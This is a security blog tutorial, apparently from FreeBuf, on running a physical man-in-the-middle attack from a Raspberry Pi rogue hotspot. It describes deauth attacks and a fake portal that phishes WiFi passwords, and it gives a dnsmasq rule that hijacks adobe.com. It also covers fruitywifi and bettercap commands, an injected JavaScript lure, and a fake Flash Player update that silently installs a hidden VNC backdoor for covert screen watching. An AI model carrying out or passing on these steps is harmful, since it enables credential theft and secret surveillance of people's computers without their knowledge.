Introduction
The previous article explained the setup of the Portable Raspberry Pi Toolkit. Recently, I have made some optimizations, mainly improving its portability and aesthetics. At the same time, some issues were discovered during actual use, leading to minor modifications.
Traditional man-in-the-middle attacks require sensitive operations like arpspoof, which are often intercepted by antivirus software. Additionally, the attacked side may experience garbled text, slow internet speeds, and even disconnections. However, using a Raspberry Pi to set up a physical man-in-the-middle can effectively avoid these issues. One network card of the Raspberry Pi connects to the internet, while the other acts as a hotspot, hijacking client traffic to pass through itself.
Preparation
1.) Overall Concept
This penetration test adopts an induced installation method, injecting JavaScript into web pages through man-in-the-middle hijacking, prompting users to download a bundled backdoor Flash Player update program.
There are several hijacking methods, roughly listed as follows:
1. Universal key software can unlock:
I. Gain operational control of the target router, modify WiFi configurations, and the Raspberry Pi forges the hotspot before.
II. If the target router supports relay, directly modify it to use as a relay, with the upstream device being the Raspberry Pi.
2. Universal key software cannot connect:
I. Send deauth attacks to block the client’s connection with the target router, while the Raspberry Pi forges a hotspot. By configuring the Raspberry Pi’s dnsmasq.config to enable no-pool, starting the webserver, and configuring a 404 page, the page will automatically pop up after the client connects, prompting the user to enter the WiFi password.
II. Capture handshake packets with the Raspberry Pi and get them done for fifteen yuan on Taobao.
III. Use social engineering to access the router, quickly press the WPS button.
2.) Generate Backdoor Program
The best backdoors are common software that antivirus programs will never eliminate. For example, ftpserver, Sunlogin oray, VNCserver, etc. Here, I choose tight-vnc-server for its compactness and convenience; generating the backdoor requires the help of tools like 7-Zip SFX Maker, Resource Hacker, and Regsnap. First, install it locally, then compare the changes in the registry and files, finally extract, streamline, and package it with Flash Player for silent installation in the background. Then, test it in various environments and make targeted modifications.
After testing, place the backdoor program in the Apache root directory, specifying the exact location in the JavaScript below.
3.) Configure dnsmasq to hijack adobe.com to local
Modify /etc/dnsmasq.conf to add
address=/adobe.com/10.0.0.1Then restart dnsmasq with service dnsmasq restart to make the configuration effective. Next, start Apache with service apache2 start.
4.) Install and Configure Software
root@kali:~# apt-get install fruitywifi-module-fruityproxy
root@kali:~# service fruitywifi startAccess: http://your-raspberry-pi-address:8000 with both username and password as admin.
Config settings are as shown below:
IN is the network card providing the AP access point, and OUT is the network card connecting to the internet, which can be configured based on actual conditions.
5.) Implement Penetration
With all preparations complete, the target device’s traffic is now all routed through the Raspberry Pi.
First, run bettercap to sniff all traffic flowing through the Raspberry Pi, getting a rough understanding of the network traffic (some commonly used commands can be written into scripts for convenience).
bettercap -I wlan1 -O log.txt -X -L -S NONE
Through network traffic and nmap scans, the IP address of the other host can be quickly determined. Then, when the host accesses the network, enable the fruitywifi Inject module.
In status→fruityprox edit→Inject, write the JavaScript to be injected to induce downloads.
<script>(function(a){window.isMobile=false;if(/(android|ipad|playbook|silk|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)....The injected script cannot have line breaks, so the code needs to be compressed in advance. The local test style is as follows:
After injection, the script will automatically detect whether the current browser is on mobile or PC. If it is PC, it will delay three seconds and then pop up the mask while inducing the download. After the user clicks, it will close the mask and restore operations on the page (or continue to block operations on the page). On mobile, nothing happens. Moreover, since dnsmasq is configured on the Raspberry Pi to point the default dnsserver and dhcpserver to the Raspberry Pi, along with the hijacking of the adobe domain, clients will not notice anything unusual.(The download link is http instead of adobe’s default https, but this is enough to deceive many people.)
6.) Check Execution Status
Periodically scan the target IP with nmap. When the 5900 port is open, it confirms that the penetration is complete, at which point disable the Inject module.
Appendix – Installation Process:
The backdoor program syncs with tvnserver. Even if unexpected situations occur, if the tvnserver installation fails, the installation status will still be checked after the Flash Player installation process ends, and a second installation attempt will be made (not installed as a system service, running in user mode).
7.) Enjoy
Use vncviewer to connect, and the target host will have no prompts or icons. You can also observe the other party’s screen without affecting the target host.
Well, don’t doubt it. I work at a data center in a hospital, responsible for maintaining system security.
Hereby, dedicated to everyone.
*This article is original by: Rc4x, this article belongs to FreeBuf’s original reward program, unauthorized reproduction is prohibited.